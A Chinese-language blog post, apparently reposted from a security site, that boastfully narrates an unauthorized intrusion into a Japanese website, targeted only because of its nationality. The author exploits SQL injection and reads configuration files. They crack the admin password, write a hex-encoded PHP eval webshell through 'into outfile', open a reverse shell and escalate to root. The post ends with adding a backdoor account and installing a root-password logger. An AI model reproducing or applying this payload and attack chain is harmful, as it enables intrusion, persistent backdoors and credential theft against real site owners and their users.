安检日本某站

这站杂说了,看了看标题带了日本2个字,ok,都清楚了,准备好锤子敲进去。

扫描了下站点,发现存在猪肉点,手工测试了下,如图:

我们来查看下相关的信息,如图:

是root,权限还不错哦。
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
返回结果都为root,ok看能不能outfile个一句话出来,测试发现不行,纠结啊..
看来只有破解后台密码,进后台拿webshell了。通过load_file读取了配置,发现了后台地址和mysql账号

由于mysql是>5.0版本的,测试了下,顺利射出了后台账号和密码

MD5解了之后进后台寻找拿webshell的地方,发现有上传,但是不能利用。经小胖胖查看发现了一个地方可以执行sql语句
于是写个一句话进去看看:select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile ‘/home/xxx/xxx.php’
这回成功了,后台经小胖看了下文件,发现search.php处理SQL语句里 调用了StripSlashes 去掉了斜线。

拿到webshell了,接下来提权,uname -a看了下

看来有戏,先反弹个cmdline shell回来

查找exp提权获取了root,本想装个ddrk或者mafix后门,结果米有成功,还是加个用户玩玩吧


用putty登录下看看,root权限


最后安装个记录root密码的小东西吧

本文摘自网络由网络安全(www.91ri.org) 收集整理.